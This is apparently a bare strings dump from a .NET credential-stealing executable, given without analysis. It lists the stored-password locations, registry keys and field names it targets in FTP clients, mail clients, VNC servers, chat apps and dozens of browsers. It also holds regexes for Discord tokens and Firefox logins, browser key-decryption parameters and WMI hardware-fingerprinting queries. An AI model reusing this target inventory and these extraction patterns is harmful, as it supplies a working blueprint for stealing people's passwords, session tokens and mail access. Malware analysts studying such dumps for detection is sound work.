HostName
UserName
PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
\FlashFXP\
Sites.dat
quick.dat
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
Server
No Password
SystemDrive
\FTP Navigator\Ftplist.txt
SmartFTP
SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
;Port=
;Password=
;User=
\Program Files (x86)\FTP Commander\Ftplist.txt
;Anonymous=
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\cftp\Ftplist.txt
;Server=
FTPGetter
<server>
\FTPGetter\servers.xml
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
COMPlus_legacyCorruptedStateExceptionsPolicy
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
eM Client\accounts.dat
o6806642kbM7c5
Mailbird
SenderIdentities
\Mailbird\Store\Store.db
Server_Host
Username
EncryptedPassword
TigerVNC
Software\TigerVNC\Server
RealVNC 4.x
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
TightVNC
Software\TightVNC\Server
PasswordViewOnly
TightVNC ControlPassword
ControlPassword
RealVNC 3.x
SOFTWARE\RealVNC\vncserver
Software\ORL\WinVNC3
SOFTWARE\RealVNC\WinVNC4
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
discordptb
Local Storage\leveldb
discordcanary
origin_url
username_value
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Default\Login Data
\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
logins.json
[^\u0020-\u007F]
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Application:
Host:
Username:
Password:
<br>Username:
<br><hr>
<br>Password:
<br>Application:
Yandex Browser
Yandex\YandexBrowser\User Data
Thunderbird
\Thunderbird\
IceCat
\Mozilla\icecat\
PaleMoon
\Moonchild Productions\Pale Moon\
Elements Browser
Elements Browser\User Data
Liebao Browser
liebao\User Data
Firefox
\Mozilla\Firefox\
Chedot
Chedot\User Data
Torch Browser
Torch\User Data
Iridium Browser
Iridium\User Data
BraveSoftware\Brave-Browser\User Data
Vivaldi
Vivaldi\User Data
QIP Surf
QIP Surf\User Data
WaterFox
\Waterfox\
uCozMedia\Uran\User Data
Sputnik
Sputnik\Sputnik\User Data
360 Browser
360Chrome\Chrome\User Data
Kometa
Kometa\User Data
Coowon
Coowon\Coowon\User Data
CentBrowser
CentBrowser\User Data
SeaMonkey
\Mozilla\SeaMonkey\
BlackHawk
\NETGATE Technologies\BlackHawk\
IceDragon
\Comodo\IceDragon\
Chromium
Chromium\User Data
Orbitum
Orbitum\User Data
Cool Novo
MapleStudio\ChromePlus\User Data
Postbox
\Postbox\
Edge Chromium
Microsoft\Edge\User Data
K-Meleon
\K-Meleon\
7Star\7Star\User Data
Chrome
Google\Chrome\User Data
Opera Browser
Opera Software\Opera Stable
Coccoc
CocCoc\Browser\User Data
Amigo\User Data
Citrio
CatalinaGroup\Citrio\User Data
Comodo Dragon
Comodo\Dragon\User Data
Epic Privacy
Epic Privacy Browser\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
CyberFox
\8pecxstudios\Cyberfox\
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
{0:X2}
OBJECTIDENTIFIER
SEQUENCE {
INTEGER
OCTETSTRING
Windows Credential
policy
chrome
{{{0}}}
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
87e9ca12-17b7-4deb-a007-812940641727
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
5999db55-9fe9-4083-bad6-bc0711c690e0
Win32_BaseBoard
SerialNumber
139402f2-c28b-46e0-b24d-178a47502825
text/html
FormatID: {0}
StorageSize: {0} (0x{0:X})
Version: 0x{0:X}
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Size of the SerializedPropertyStore is less than {0} ({1})
Size of the SerializedPropertyStorage is less than 28 ({0})
Version is not equal to {0} ({1})
Value: {0}
Type: {0}
Name: {0}
ValueSize: {0} (0x{0:X})
NameSize: {0} (0x{0:X})
Size of the NameSize is not equal to {0} ({1})
Size of the StringName is less than 9 ({0})
Size of the StringName is not equal to {0} ({1})
ID: 0x{0:X}
Size of the SerializedPropertyStore is less than 8 ({0})
StoreSize: {0} (0x{0X})
\Device\LanmanRedirector\
Failed to retrieve system handle information.
Accounts
logins
sha512
credential
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
9399542a-76f8-4416-a309-38c8d6207f1c.exe
LegalCopyright
OriginalFilename
9399542a-76f8-4416-a309-38c8d6207f1c.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0